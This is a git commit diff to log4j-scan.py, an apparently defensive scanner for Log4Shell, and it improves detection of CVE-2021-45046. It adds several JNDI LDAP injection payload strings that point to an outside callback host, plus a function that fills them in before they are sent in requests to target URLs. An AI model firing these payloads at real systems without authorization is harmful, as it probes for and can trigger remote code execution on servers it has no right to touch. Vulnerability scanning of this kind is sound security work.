improvements on cve_2021_45046 detection

fullhunt · Dec 17, 2021 · b056741 · b056741
1 parent 2f7852b
commit b056741
Showing 1 changed file with 18 additions and 6 deletions.
diff --git a/log4j-scan.py b/log4j-scan.py
@@ -16,6 +16,7 @@
 from urllib import parse as urlparse
 import base64
 import json
+import random
 from uuid import uuid4
 from base64 import b64encode
 from Crypto.Cipher import AES, PKCS1_OAEP
@@ -60,7 +61,9 @@
                        ]
 
 cve_2021_45046 = [
-                  "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}" # Source: https://twitter.com/marcioalm/status/1471740771581652995
+                  "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
+                  "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
+                  "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
                  ]  
 
 
@@ -71,7 +74,7 @@
                     action='store')
 parser.add_argument("-p", "--proxy",
                     dest="proxy",
-                    help="Send requests through proxy. proxy should be specified in the format supported by requests (http[s]://<proxy-ip>:<proxy-port>)",
+                    help="send requests through proxy",
                     action='store')
 parser.add_argument("-l", "--list",
                     dest="usedlist",
@@ -130,7 +133,6 @@
 if args.proxy:
     proxies = {"http": args.proxy, "https": args.proxy}
 
-
 def get_fuzzing_headers(payload):
     fuzzing_headers = {}
     fuzzing_headers.update(default_headers)
@@ -162,6 +164,14 @@ def generate_waf_bypass_payloads(callback_host, random_string):
         payloads.append(new_payload)
     return payloads
 
+def get_cve_2021_45046_payloads(callback_host, random_string):
+    payloads = []
+    for i in cve_2021_45046:
+        new_payload = i.replace("{{callback_host}}", callback_host)
+        new_payload = new_payload.replace("{{random}}", random_string)
+        payloads.append(new_payload)
+    return payloads
+
 
 class Dnslog(object):
     def __init__(self):
@@ -276,7 +286,9 @@ def scan_url(url, callback_host):
     if args.waf_bypass_payloads:
         payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
     if args.cve_2021_45046:
-        payloads = cve_2021_45046
+        cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
+        payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
+
     for payload in payloads:
         cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
         if args.request_type.upper() == "GET" or args.run_all_tests:
@@ -337,7 +349,7 @@ def main():
     dns_callback_host = ""
     if args.custom_dns_callback_host:
         cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
-        dns_callback_host = args.custom_dns_callback_host
+        dns_callback_host =  args.custom_dns_callback_host
     else:
         cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
         if args.dns_callback_provider == "interact.sh":
@@ -362,7 +374,7 @@ def main():
     time.sleep(int(args.wait_time))
     records = dns_callback.pull_logs()
     if len(records) == 0:
-        cprint("[•] Reachable Targets do not seem to be vulnerable.", "green")
+        cprint("[•] Targets does not seem to be vulnerable.", "green")
     else:
         cprint("[!!!] Target Affected", "yellow")
         for i in records: